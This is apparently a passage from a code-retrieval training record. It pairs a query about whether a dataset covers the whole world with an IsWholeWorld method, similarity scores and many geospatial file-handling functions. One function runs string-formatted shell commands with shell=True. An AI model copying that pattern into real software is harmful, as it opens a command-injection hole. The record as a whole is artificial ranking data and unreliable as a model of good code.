{0}\".format(XYZ_path))\n ## end if\n\n # Assemble the coordinates vector into the actual coordinates\n # stack for the XYZ\n self.geoms.append(coord_vec)\n\n # Increment the count of the number of geometries. 
Once the\n # 'mch' iteration is completed, this will accurately reflect\n # the number of geometries read from the file.\n self.num_geoms += 1\n\n ## next mch", "def create_dat_from_csv(windgrid_file, DAT_header, output_file, wind_field='gust_mph', latitude_field='lat', longitude_field='lon'):\n df = pd.read_csv(windgrid_file)\n df['geometry'] = [Point(x, y) for x, y in zip(\n df[longitude_field], df[latitude_field])]\n gdf = gpd.GeoDataFrame(df, geometry='geometry')\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def read_from(self, filename):\n\n lon, lat, field, weight = [], [], [], []\n\n if os.path.exists(filename):\n logger.info(\"Reading data from file {0}\".format(filename))\n with open(filename, 'r') as f:\n line = f.readline()\n ncols = len(line.split())\n while ncols >= 3:\n lon.append(float(line.split()[0]))\n lat.append(float(line.split()[1]))\n field.append(float(line.split()[2]))\n if ncols >= 4:\n weight.append(float(line.split()[3]))\n else:\n weight.append(1.)\n line = f.readline()\n ncols = len(line.split())\n\n self.x = np.array(lon)\n self.y = np.array(lat)\n self.field = np.array(field)\n self.weight = np.array(weight)\n return self\n else:\n logger.error(\"File {0} does not exist\".format(filename))\n raise FileNotFoundError('File does not exist')", "def open_gz(filename, mode):\n return gzip.open(filename, mode)", "def readArray(input):\n data = gdal.Open(input)\n band = data.GetRasterBand(1)\n \n return band.ReadAsArray()", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def read_file(netcdf_file_name):\n\n dataset_object = netCDF4.Dataset(netcdf_file_name)\n\n saliency_dict = {\n MODEL_FILE_KEY: str(getattr(dataset_object, MODEL_FILE_KEY)),\n IS_LAYER_OUTPUT_KEY: bool(getattr(dataset_object, IS_LAYER_OUTPUT_KEY)),\n LAYER_NAME_KEY: str(getattr(dataset_object, LAYER_NAME_KEY)),\n NEURON_INDICES_KEY: numpy.array(\n getattr(dataset_object, NEURON_INDICES_KEY), dtype=int\n ),\n IDEAL_ACTIVATION_KEY: getattr(dataset_object, IDEAL_ACTIVATION_KEY),\n MULTIPLY_BY_INPUT_KEY:\n bool(getattr(dataset_object, MULTIPLY_BY_INPUT_KEY)),\n 
VALID_TIMES_KEY: numpy.array(\n dataset_object.variables[VALID_TIMES_KEY][:], dtype=int\n ),\n LATITUDES_KEY: numpy.array(\n dataset_object.variables[LATITUDES_KEY][:], dtype=float\n ),\n LONGITUDES_KEY: numpy.array(\n dataset_object.variables[LONGITUDES_KEY][:], dtype=float\n ),\n SALIENCY_MATRIX_KEY: numpy.array(\n dataset_object.variables[SALIENCY_MATRIX_KEY][:], dtype=float\n )\n }\n\n dataset_object.close()\n return saliency_dict", "def get_infile(filename):\r\n if filename.endswith(\".gz\"):\r\n fin = GzipFile(filename, \"rb\")\r\n else:\r\n fin = open(filename, \"U\")\r\n return fin", "def get_infile(filename):\r\n if filename.endswith(\".gz\"):\r\n fin = GzipFile(filename, \"rb\")\r\n else:\r\n fin = open(filename, \"U\")\r\n return fin", "def open_input_file(input_file):\n if input_file:\n if not os.path.isfile(input_file):\n sys.stderr.write(\n \"ERROR! Input file (%s) is not a normal file.\\n\" % input_file)\n sys.exit(1)\n try:\n return codecs.open(input_file, \"r\", \"utf8\")\n except:\n sys.stderr.write(\n \"ERROR! Could not open input file (%s) for reading:\\n\" % input_file)\n raise\n else:\n return sys.stdin", "def open_local_or_gcs(path, mode):\n if path.startswith('gs://'):\n try:\n return gcsio.GcsIO().open(path, mode)\n except Exception as e: # pylint: disable=broad-except\n # Currently we retry exactly once, to work around flaky gcs calls.\n logging.error('Retrying after exception reading gcs file: %s', e)\n time.sleep(10)\n return gcsio.GcsIO().open(path, mode)\n else:\n return open(path, mode)", "def import_L1B(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n\r\n image=image()\r\n\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def open_file(file_path, mode='rb', encoding='iso-8859-1'):\n try:\n return open(file_path, mode=mode, encoding=encoding)\n except IOError:\n raise", "def file_open(*args, **kwargs):\n return open(*args, **kwargs)", "def open_file(self, path, omode=\"r\"):\n self.root_group = netCDF4.Dataset(path, omode)\n return self.root_group", "def open_(filename, *args):\n\n if (filename[-3:] == '.gz'):\n return gzip.open(filename, *args)\n try:\n return open(filename, *args)\n except OSError:\n return gzip.open(filename + \".gz\", *args)", "def open(path, mode='r', destpath=os.curdir, encoding=None, newline=None):\n\n ds = DataSource(destpath)\n return ds.open(path, mode, encoding=encoding, newline=newline)", "def open_file(path, config):\n\n return fopen(normalize_path(path, config))", "def openInputFile(infile, *args):\n if infile is None:\n logging.info(\"Reading input from STDIN\")\n return sys.stdin\n\n if isinstance(infile, str):\n if urlRE.match(infile):\n import urllib2\n return urllib2.urlopen(infile)\n if len(infile)>3 and infile[-3:]=='.gz':\n import gzip\n return gzip.GzipFile(infile,'rb')\n elif len(infile)>4 and infile[-4:]=='.bz2':\n import bz2\n return bz2.BZ2File(infile,'rb')\n else:\n return open(infile,'rt')\n else:\n return infile", "def open_input_stream(uri: str) -> BinaryIO:\n parsed = urlparse(uri)\n if parsed.scheme == \"gs\":\n return _gcsfs().open(uri)\n else:\n filesystem, path = fs.FileSystem.from_uri(uri)\n return filesystem.open_input_file(path)", "def read(self, format=None, epsg=None):\n if not format:\n format = self.default_output\n if self.data is None and self.features:\n if type(self.features) == str:\n self.features = json.loads(self.features)\n features = self.features\n\n if 'type' in features and 
features['type'] == 'FeatureCollection':\n self.data = geopandas.GeoDataFrame.from_features(\n self.features['features'])\n else:\n self.data = geopandas.GeoDataFrame.from_features(features)\n if not self.data.crs:\n if hasattr(self, 'crs'):\n self.data.crs = self.crs\n else:\n self.get_epsg()\n\n return self.transform_data(outformat=format, epsg=epsg)", "def import_national_boundaries(self, name):\n print \"\\n4.3- importa shape con confini nazionali ISTAT\"\n countrySHP = os.path.join(\"boundaries\", \"italy_2011_WGS84.shp\")\n countrySQL = os.path.join(\"boundaries\", \"italy_%s.sql\" % name)\n if os.path.isfile(countrySQL):\n call(\"rm %s\" % countrySQL, shell=True)\n cmd = \"shp2pgsql -s 4326 -W 'LATIN1' %s italy %s > %s\" % (countrySHP, name, countrySQL)\n print cmd\n call(cmd, shell=True)\n call(\"psql -h localhost -U %s -d %s -f %s\" % (self.user, name, countrySQL), shell=True)\n call(\"rm %s\" % countrySQL, shell=True)\n call(\"echo 'CREATE INDEX ON italy USING GIST (geom);'| psql -U %s -d %s\" % (self.user, name), shell=True)\n call(\"echo 'ANALYZE italy;'| psql -U %s -d %s\" % (self.user, name), shell=True)", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def load_gldas_elevation_dataset(gldas_elevation_file): \n d1 = xr.open_dataset(gldas_elevation_file).load()\n return d1", "def genOpen(filename, mode):\n (name, ext) = os.path.splitext(filename)\n if ext == \".gz\":\n return gzip.open(filename, mode)\n else:\n return open(filename, mode)", "def genOpen(filename, mode):\n (name, ext) = os.path.splitext(filename)\n if ext == \".gz\":\n return gzip.open(filename, mode)\n else:\n return open(filename, mode)", "def open_(filename, mode=None, compresslevel=9):\n if filename[-3:] == '.gz':\n if mode is None: mode = 'rt'\n return closing(gzip.open(filename, mode, compresslevel))\n else:\n if mode is None: mode = 'r'\n return open(filename, mode)", "def from_file(path):\n\n filename = os.path.basename(path)\n\n base, suffix = os.path.splitext(filename);\n\n if suffix == '.bin':\n g = bgy3d.from_file(path)\n elif suffix == '.m':\n g = contf.m2dat(path)\n else:\n print 'Unknown file suffix.'\n exit()\n\n return g", "def load_surfer(fname, fmt='ascii'):\n assert fmt in ['ascii', 'binary'], \"Invalid grid format '%s'. Should be \\\n 'ascii' or 'binary'.\" % (fmt)\n if fmt == 'ascii':\n # Surfer ASCII grid structure\n # DSAA Surfer ASCII GRD ID\n # nCols nRows number of columns and rows\n # xMin xMax X min max\n # yMin yMax Y min max\n # zMin zMax Z min max\n # z11 z21 z31 ... 
List of Z values\n with open(fname) as ftext:\n # DSAA is a Surfer ASCII GRD ID\n id = ftext.readline()\n # Read the number of columns (ny) and rows (nx)\n ny, nx = [int(s) for s in ftext.readline().split()]\n shape = (nx, ny)\n # Read the min/max value of columns/longitue (y direction)\n ymin, ymax = [float(s) for s in ftext.readline().split()]\n # Read the min/max value of rows/latitude (x direction)\n xmin, xmax = [float(s) for s in ftext.readline().split()]\n area = (xmin, xmax, ymin, ymax)\n # Read the min/max value of grid values\n datamin, datamax = [float(s) for s in ftext.readline().split()]\n data = numpy.fromiter((float(i) for line in ftext for i in\n line.split()), dtype='f')\n data = numpy.ma.masked_greater_equal(data, 1.70141e+38)\n assert numpy.allclose(datamin, data.min()) \\\n and numpy.allclose(datamax, data.max()), \\\n \"Min and max values of grid don't match ones read from file.\" \\\n + \"Read: ({}, {}) Actual: ({}, {})\".format(\n datamin, datamax, data.min(), data.max())\n # Create x and y coordinate numpy arrays\n x, y = regular(area, shape)\n if fmt == 'binary':\n raise NotImplementedError(\n \"Binary file support is not implemented yet.\")\n return x, y, data, shape", "def convertCSVToGeoTIFF(geoproperties, datafile, outputdir, outfile):\n \n data = numpy.genfromtxt(datafile, delimiter=',')\n \n Ny, Nx = data.shape\n \n #print data.size\n #print data.shape\n #print data\n \n # slice out the last column of null values\n if str(data[Ny-1][Nx-1]) == 'nan':\n data = data[:,:-1]\n \n Ny, Nx = data.shape\n \n #print data.size\n #print data.shape\n #print data\n #print Ny, Nx\n \n startPos = [geoproperties['tl']['long'],geoproperties['tl']['lat']]\n d_lat = (geoproperties['br']['lat'] - geoproperties['tl']['lat']) / (Ny - 1)\n d_long = (geoproperties['br']['long'] - geoproperties['tl']['long']) / (Nx - 1)\n \n #print startPos, d_lat, d_long\n \n driver = gdal.GetDriverByName(\"GTiff\")\n ds = driver.Create(os.path.join(outputdir,outfile),Nx,Ny,1,gdal.GDT_Float32)\n #ds = driver.Create('output/output.tif',Nx,Ny,1,gdal.GDT_Byte)\n #ds.SetGeoTransform( [ -158.584, .008, 0, 21.108, 0, .008 ] )\n ds.SetGeoTransform( [ startPos[0], d_long, 0, startPos[1], 0, d_lat ] )\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n ds.SetProjection( srs.ExportToWkt() )\n ds.GetRasterBand(1).WriteArray(data)\n ds = None", "def open_file(self, path: str, **kwargs) -> OpenFileType:\n full_path = self._full_path(path)\n logger.debug(f\"returning open file for {full_path}\")\n return self.fs.open(full_path, **kwargs)", "def smart_open(filename: str, mode: str = \"rt\", ftype: str = \"auto\", errors: str = \"replace\"):\n if ftype == \"gzip\" or ftype == \"gz\" or (ftype == \"auto\" and filename.endswith(\".gz\")):\n return gzip.open(filename, mode=mode, encoding=\"utf-8\", errors=errors)\n else:\n return open(filename, mode=mode, encoding=\"utf-8\", errors=errors)", "def _open_file(self,path):\n \n print \"Open File %s\" % path\n \n mapping = self.mappings.GetClientData(self.mappings.GetSelection())\n try:\n delimiter=mapping['_params']['delimiter']\n except:\n delimiter=','\n try:\n skip_last=mapping['_params']['skip_last']\n except:\n skip_last=0\n self.grid_table = SimpleCSVGrid(path,delimiter,skip_last)\n self.grid.SetTable(self.grid_table)\n\tself.opened_path = path", "def open_input_files(self):\n self.dictionaryFile = open(self.dictionaryFile, 'r', encoding=self.encoding)\n\n if self.annotationFile :\n self.annotationFile = open(self.annotationFile, 'r', 
encoding=self.encoding)\n elif self.annotationFile is None:\n try:\n self.annotationFile = open(os.path.join(self.dictionaryPath, self.dictionaryName + '.ann'), 'r', encoding=self.encoding)\n except FileNotFoundError:\n if self.verbose >= 2:\n sys.stdout.write (\"Warning: annotation file is not found.\\n\")\n\n if self.abbreviationsFile :\n self.abbreviationsFile = open(self.abbreviationsFile, 'r', encoding=self.encoding)\n elif self.abbreviationsFile is None:\n try:\n self.abbreviationsFile = open(os.path.join(self.dictionaryPath, self.dictionaryName + '_abrv.dsl'), 'r', encoding=self.encoding)\n except FileNotFoundError:\n if self.verbose >= 2:\n sys.stdout.write (\"Warning: abbreviations file is not found.\\n\")", "def get_data(datapath, asfile=False):\n import os\n\n ## The file is a local file - try to get it\n if not os.path.isfile(datapath) :\n print \"The file %s you are trying to access does not exist\" %(datapath)\n raise IOError\n fn = datapath\n if asfile:\n return open(fn)\n else:\n import numpy as np\n return np.loadtxt(fn)", "def convert_gpkg_to_geojson(self,shape_fname, destdirectory):\r\n\t\tfeatures = []\r\n\t\tcrs = None\r\n\t\tif not os.path.isfile(shape_fname):\r\n\t\t\tself.logger.error('File not found: %s' % shape_fname)\r\n\t\tself.opstatus.add_info(stage=6, msg = \"Rounding coordinates to six decimal precision\")\r\n\r\n\r\n\t\tout_fname = os.path.join(destdirectory,os.path.basename(shape_fname).replace('.gpkg', '.geojson'))\r\n\t\twith fiona.open(shape_fname, driver='GPKG') as source:\r\n\t\t\twith fiona.open(out_fname, \"w\",driver='GeoJSON',crs = fiona.crs.from_epsg(4326),schema=source.schema) as sink:\r\n\t\t\t\tfor rec in source:\r\n\t\t\t\t\tsink.write(rec)\r\n\r\n\t\tself.logger.info('file written: %s' % out_fname)\r\n\t\tself.opstatus.set_status(stage=6, status=1, statustext =\"File successfully converted to GeoJSON with six decimal precision\")\r\n\t\tself.opstatus.add_success(stage=6, msg = \"GeoJSON file successfully written\")\r\n\t\treturn out_fname" ]
[ "0.67583877", "0.6669646", "0.6662748", "0.6427024", "0.5995178", "0.57921493", "0.5738032", "0.5566471", "0.5458556", "0.5453362", "0.5418001", "0.5346144", "0.5346144", "0.5330134", "0.52282006", "0.52168894", "0.5216014", "0.5212678", "0.5209175", "0.51660335", "0.5159364", "0.5139224", "0.5109491", "0.5063188", "0.5039358", "0.50391394", "0.5036992", "0.5032136", "0.49825037", "0.49768433", "0.49634218", "0.49291316", "0.49258372", "0.49227995", "0.49173376", "0.48916772", "0.48818195", "0.4878031", "0.48741856", "0.48651612", "0.4848519", "0.4846156", "0.4844945", "0.48447692", "0.48424593", "0.48284596", "0.48215058", "0.48200557", "0.48179197", "0.47830737", "0.4771", "0.47534102", "0.47239733", "0.47052342", "0.47002077", "0.46981978", "0.46945617", "0.46943188", "0.46895388", "0.46886396", "0.46577543", "0.46577388", "0.4653829", "0.46536294", "0.46345222", "0.46340176", "0.46242735", "0.46226275", "0.46201566", "0.46136242", "0.4609307", "0.46048144", "0.46048144", "0.46027505", "0.4596128", "0.45946392", "0.4592517", "0.45831355", "0.45733684", "0.45672545", "0.45659703", "0.4560109", "0.45539266", "0.45529532", "0.45514315", "0.45399165", "0.45339638", "0.4533894", "0.45324218", "0.45324218", "0.45311448", "0.45118484", "0.45111206", "0.45072922", "0.4507189", "0.45051438", "0.4503528", "0.44913948", "0.44837382", "0.44752026" ]
0.62465745
4
Returns whether the dataset covers the whole world or not.
def IsWholeWorld(self, resolution=None): if resolution is None: resolution = self.GetNativeResolution() spatial_ref = self.GetSpatialReference() world_extents = spatial_ref.GetWorldExtents() extents = self.GetExtents() ll_offset = world_extents.lower_left - extents.lower_left ur_offset = world_extents.upper_right - extents.upper_right pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution) return (abs(ll_offset.x) <= pixel_sizes.x and abs(ll_offset.y) <= pixel_sizes.y and abs(ur_offset.x) <= pixel_sizes.x and abs(ur_offset.y) <= pixel_sizes.y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_full_dimensional(self):\n\n return self.affine_dimension() == self.space_dimension()", "def is_dataset(self):\n return self._dataset is not None", "def ejscreen_areas_of_concern_data_exists(cls):\n return cls.EJSCREEN_AREAS_OF_CONCERN_SOURCE.is_file()", "def is_mainland(self):\n return self._is_mainland", "def all(self):\n for v in self.sects.values():\n if not np.all(v):\n return False\n if self.is_full():\n return True\n else:\n return np.all(self.defval)", "def is_full(self) -> bool:\n return self._array[0].all()", "def contains_origin(self):\n return self.contains(self.ambient_space().zero())", "def geospatial(self):\n return bool(\n self.dataset.GetProjection() or\n (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()) or\n self.dataset.GetGeoTransform(can_return_null=True) or\n hasattr(self, '_netcdf'))", "def has_data(self):\n return ([0] != self.__contexts) and ([0] != self.__weights)", "def is_full(self):\n elements_in_sects = sum(\n map(opr.attrgetter(\"size\"), self.sects.values())\n )\n elements_in_total = fct.reduce(\n opr.mul, type(self).flatten_shape(self.shape), 1\n )\n res = elements_in_sects >= elements_in_total\n return res", "def test_contains(self):\n dim = Fidelity(\"epoch\", 1, 10)\n\n assert 0 not in dim\n assert 1 in dim\n assert 5 in dim\n assert 10 in dim\n assert 20 not in dim", "def full(self):\n for x in range(0,3):\n for y in range(0,3):\n if self[x,y] is None:\n return False\n return True", "def is_subset_of(self, uspec):\n \n if self.is_power_onoff() or uspec.is_power_onoff():\n return False\n \n if (uspec.is_bias() or not uspec.is_calib()) and self['speed'] != uspec['speed']:\n return False\n\n if int(self['x_bin']) % int(uspec['x_bin']) != 0 or int(self['y_bin']) % int(uspec['y_bin']) != 0:\n return False\n\n if self.number_windows() > 0:\n\n if not uspec.contains_window(self['x1_start'], self['y1_start'], self['x1_size'], self['y1_size'], self['x_bin'], self['y_bin']):\n return False\n\n if self.number_windows() > 1:\n\n if not uspec.contains_window(self['x2_start'], self['y2_start'], self['x2_size'], self['y2_size'], self['x_bin'], self['y_bin']):\n return False\n\n return True", "def any(self):\n for v in self.sects.values():\n if np.any(v):\n return True\n if self.is_full():\n return False\n else:\n return np.any(self.defval)", "def is_land(self, only_land: bool = False) -> bool:\n generator = (\n any(_type.name == \"Land\" for _type in face.types.all())\n for face in self.faces.all()\n )\n if only_land:\n return all(generator)\n return any(generator)", "def _is_legal(self, h5_main, variables=None):\n if variables is None:\n variables = ['DC_Offset']\n\n file_data_type = get_attr(h5_main.file, 'data_type')\n meas_grp_name = h5_main.name.split('/')\n h5_meas_grp = h5_main.file[meas_grp_name[1]]\n meas_data_type = get_attr(h5_meas_grp, 'data_type')\n\n if h5_main.dtype != sho32:\n warn('Provided dataset is not a SHO results dataset.')\n return False\n\n # This check is clunky but should account for case differences. If Python2 support is dropped, simplify with\n # single check using casefold.\n if not (meas_data_type.lower != file_data_type.lower or meas_data_type.upper != file_data_type.upper):\n warn('Mismatch between file and Measurement group data types for the chosen dataset.')\n print('File data type is {}. 
The data type for Measurement group {} is {}'.format(file_data_type,\n h5_meas_grp.name,\n meas_data_type))\n return False\n\n if file_data_type == 'BEPSData':\n if get_attr(h5_meas_grp, 'VS_mode') not in ['DC modulation mode', 'current mode']:\n warn('Provided dataset is not a DC modulation or current mode BEPS dataset')\n return False\n elif get_attr(h5_meas_grp, 'VS_cycle_fraction') != 'full':\n warn('Provided dataset does not have full cycles')\n return False\n\n elif file_data_type == 'cKPFMData':\n if get_attr(h5_meas_grp, 'VS_mode') != 'cKPFM':\n warn('Provided dataset has an unsupported VS_mode.')\n return False\n\n return super(BELoopFitter, self)._is_legal(h5_main, variables)", "def is_consistent_dataset(data: dict, parameter_box: np.ndarray = None) -> bool:\n train_set = copy.deepcopy(data)\n y, phi = train_set[\"outputs\"].pop(-1), train_set[\"features\"].pop(-1)\n y, phi = np.array(y)[..., np.newaxis], np.array(phi)[..., np.newaxis]\n if train_set[\"outputs\"] and train_set[\"features\"]:\n theta, _, gramian, beta = confidence_polytope(train_set, parameter_box=parameter_box)\n return is_valid_observation(y, phi, theta, gramian, beta)\n else:\n return True", "def is_full(self) -> bool:", "def has_dimension(self, dim):\n\n return self.units.dimensions == dim", "def isEmptyLandmarkset(self):\n return self.subsetpointcloud is None", "def isComplete(self):\n assert len(self._x) > 0\n assert len(self._y) > 0\n assert 2 == len(self._data_array.shape)\n assert self.wkt is not None\n assert self.wkt != ''\n\n return True", "def maybe_distal(self):\n return bool(set(self.locations) & set(StandardTerminology.DISTAL_LOCATIONS))", "def test_outside_grid(dataset):\n\n tf = Delft3D_Mudflats(dataset, dry_depth=-10000) # make sure nothing is dry\n\n points = ((3.5, 54.0), # off\n (7.5, 53.4), # off\n (6.0, 52.0), # off\n (5.3, 53.3), # on\n (5.2, 53.25), # on\n )\n\n time = datetime(2009, 1, 15, 0)\n\n result = tf.is_dry(points, time)\n\n print \"results\", result\n\n assert list(result) == [True, True, True, False, False]", "def get_allsky(self):\n band = self.get_band()\n septon = self.is_septon()\n if band == '10_90' or band == '30_90' or septon:\n allsky = True\n else:\n allsky = False\n return allsky", "def check_empty(self, coord):\n x, y, z = coord\n if self.perlin_3d(x, y, z) <= 0:\n return True\n else:\n return False", "def test_contains_bounds(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n with pytest.raises(NotImplementedError):\n assert -3 in dim", "def is_full(self):\n return len(self.walls) == 4", "def check_visibility(self):\r\n\r\n for gs in self.ground_stations:\r\n if self.visible ^ (elevation_dot_product(self.r_ecef,self.ground_stations[gs][1],self.earth) > 0.0):\r\n self.visible ^= 1\r\n self.gs_id = self.ground_stations[gs][0]\r\n return True", "def is_distal(self):\n return bool(set(self.locations) and set(self.locations) <= set(StandardTerminology.DISTAL_LOCATIONS)) \\\n or bool(self.depth and 16 < self.depth < 82)", "def __contains__(self, point):\n for component, dim in zip(point, self.dimensions):\n if component not in dim:\n return False\n return True", "def contains(self, x):\n # need more to assure its a real SSP - ie on right torus\n return (len(x) == self._shape[0])", "def is_fitted(self):\n return self.__fdata is not None", "def is_infrastructure (self):\n return sum([1 for i in self.infras]) != 0", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def has_osm_data(self):\n return settings.MSPRAY_OSM_PRESENCE_FIELD in self.data", 
"def exists_dataset(self, dataset):\n assert dataset, \"Must input a valid dataset name.\"\n return any(self.get_by_dataset(dataset))", "def is_full(self):\n return len(self._data) == 1", "def is_full(self):\n return False", "def _has_coordinates_and_gradient(self) -> bool:\n return self._coords is not None and self._coords.g is not None", "def is_artificial(self):\n\t\treturn 0", "def is_on_ground(self):\n return bool(self.ground_sprites())", "def detect_in_bounds(self):\n creature_x, creature_y = self.creature.current_location\n if creature_x < 0 or creature_x >= self.world_width\\\n or creature_y < 0 or creature_y >= self.world_height:\n print('The creature is out of bounds!')\n return False\n return True", "def healthy_test(obj: np.ndarray) -> bool:\n nb_rows, nb_cols = obj.shape\n return nb_rows == nb_cols > 1 and np.array_equal(obj, colony(nb_rows))", "def check_tile_covers_land(self, tilename=None):\n land_tiles = self.list_tiles_covering_land()\n if self.check_tilename(tilename):\n tilename = self.tilename2short(tilename)\n return tilename in land_tiles", "def _is_vessel_full(self):\n return np.size(np.where(self.end_of_lanes + (np.ones(self.lanes) * self.minimal_package) <= self.rows)) == 0", "def can_attack_world(self, world: World) -> bool:\n forces = self.context.calculate_forces(world)\n return (\n forces.space_forces <= self.max_space_force\n and forces.ground_forces <= self.max_ground_force\n )", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def exposed(self, position):\r\n x, y, z = position\r\n for dx, dy, dz in FACES:\r\n if (x + dx, y + dy, z + dz) not in self.world:\r\n return True\r\n return False", "def _loaded_data(self):\n try:\n dsize = [int(d) for d\n in self.run('fits size', via='get').split()]\n except (ValueError, TypeError, AttributeError) as err:\n log.debug(f' FITS size error: {err}')\n return False\n else:\n if 0 in dsize:\n return False\n else:\n return True", "def is_alld(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'c':\n return False\n return True", "def contains(self, coord):\n # print(coord, self.position, self.size)\n return (0 <= coord[0] - self.position[0] < self.size[0] and\n 0 <= coord[1] - self.position[1] < self.size[1])", "def wid_in(self, wid):\n \n for row in self.tiles:\n if wid in row:\n return True\n return False", "def is_full(self):\n return self.name and self.variables and self.assumptions and self.guarantees", "def in_water(latitude: float, longitude: float) -> bool:\n path = os.path.abspath('water_polygons.shp')\n with fiona.open(path) as fiona_collection:\n box_detail = 0.0001\n point = Point(longitude, latitude)\n # here we filter to only scan results near the point in question.\n for record in fiona_collection.filter(bbox=(\n longitude+box_detail, latitude+box_detail,\n longitude-box_detail, latitude-box_detail)):\n if record['geometry']:\n shape = asShape(record['geometry'])\n if shape.contains(point):\n return True\n return False", "def exists(dtype, name, rootdir=None):\n return FreezableAPI.to_slug(dtype,name) in FreezableAPI.datasets(rootdir=rootdir)", "def has_dominance(self):\n trait = self.traitDao.get_dominance(self.name)\n if trait is None:\n return False\n else:\n return True", "def has_data(self, fit_id, species_id, start=None, stop=None):\n if not (fit_id in self.raw_results and species_id in\\\n self.raw_results[fit_id]):\n return False\n if all([isinstance(x, datetime) for x in [start, stop]]):\n ts = self.raw_results[fit_id][\"start\"]\n if not 
any([start < x < stop for x in ts]):\n return False\n return True", "def is_dataset_in_t_range(dataset, t_min, t_max):\n for obj in dataset.object_names:\n obj_data = dataset.data[obj]\n t_min_obj = np.min(obj_data['mjd'])\n t_max_obj = np.max(obj_data['mjd'])\n if (t_min_obj < t_min) or (t_max_obj > t_max):\n return False\n return True", "def is_island(self):\n return bool(not self.children.exists() and not self.parents.exists())", "def has_2D(self):\n\t\tif self.have_fastas is False:\n\t\t\tself._extract_fastas_from_fast5()\n\t\t\tself.have_fastas = True\n\n\t\tif self.fastas.get('twodirections') is not None:\n\t\t\treturn True\n\t\treturn False", "def verify(self):\n D,S,I,C = False,False,False,False\n if self.geoData and os.path.exists(self.geoData):\n D = True\n if self.scales:\n S = True\n if type(self.idVariable) == int:\n I = True\n if self.cacheFile:\n C = True\n if D and S and I and C:\n return True\n return False", "def covers(self, right: GeoSpatialValue) -> ir.BooleanValue:\n return ops.GeoCovers(self, right).to_expr()", "def HasData(self, search_all_index = False):\n\t\tif not search_all_index:\n\t\t\treturn ExistsFile(self.__datafilename(self.__pindex))\n\t\tfor pindex in range(0, len(GV.provinces)):\n\t\t\tif ExistsFile(self.__datafilename(pindex)):\n\t\t\t\treturn True\n\t\treturn False", "def is_full(self) -> bool:\n pass", "def has_fullhouse(self):\n if self.has_pair() & self.has_three_of_a_kind():\n self.rank_per_hand['5'] = \"full house\"\n return True\n return False", "def is_valid(self, dataset):\n pass", "def contains(self, point):\n return 0 <= point.x <= 1 \\\n and 0 <= point.y <= 1 \\\n and 0 <= point.z <= 1", "def has_guardian(self):\n return self.tiles.count(3) > 0", "def __contains__(self, item):\n return item in self.default_dataset", "def in_bounds(self, location: tuple) -> bool:\n return 0 <= min(location) and max(location) <= 7", "def can_exist_outside_of_game(self):\n return True", "def can_exist_outside_of_game(self):\n return True", "def checkBottom(self):\n exposed = True\n for sprite in self.overlapping_sprites:\n if sprite not in self.game.neutrinos:\n a = abs(self.bottom - sprite.top)\n b = abs(self.top - sprite.bottom)\n c = abs(self.left - sprite.right)\n d = abs(self.right - sprite.left)\n if a < b and a < c and a < d:\n exposed = False\n break\n return exposed", "def is_allc(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'd':\n return False\n return True", "def in_geo_limits(args: argparse.Namespace, track_data: dict) -> bool:\n return (track_data['boundaries']['north'] <= args.north_lim and\n track_data['boundaries']['south'] >= args.south_lim and\n track_data['boundaries']['east'] <= args.east_lim and\n track_data['boundaries']['west'] >= args.west_lim)", "def has_datapoint_with_all_dims(fake_ingest, dims):\n for datapoint in fake_ingest.datapoints:\n if has_all_dims(datapoint, dims):\n return True\n return False", "def is_full(self):", "def is_loaded(self):\n return self.known_stations != {}", "def any(self):\n boolean = True\n if type(self.idxs) == np.ndarray:\n boolean = 